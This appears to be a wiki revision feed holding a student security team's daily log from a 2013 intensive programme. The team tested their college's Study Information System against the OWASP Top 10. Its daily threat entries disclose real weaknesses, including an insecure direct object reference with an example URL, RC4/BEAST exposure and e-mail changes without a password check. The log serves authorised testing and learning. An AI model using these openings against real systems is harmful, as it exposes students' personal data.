A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Discussion about today&#039;s plans.&lt;br /&gt;
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).&lt;br /&gt;
* Every member wrote a feedback to Wiki page&lt;br /&gt;
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)&lt;br /&gt;
* IP summarisation.&lt;br /&gt;
* Farewell party at St. Patrick&#039;s.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Farewell party, sleep well and start trip to home! :)&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of the project to the clients (4 April 2013)&#039;&#039;&#039;&lt;br /&gt;
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] &#039;&#039;(Made by whole team, structure by Sandra and Jurij)&#039;&#039;&lt;br /&gt;
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] &#039;&#039;(Team Security starts from 18:30)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** Googeled a lot :)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** I have learned about security breaches on the web.&lt;br /&gt;
** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
==IP Feed-back==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62381</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62381"/>
		<updated>2013-04-05T07:01:16Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Activity */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
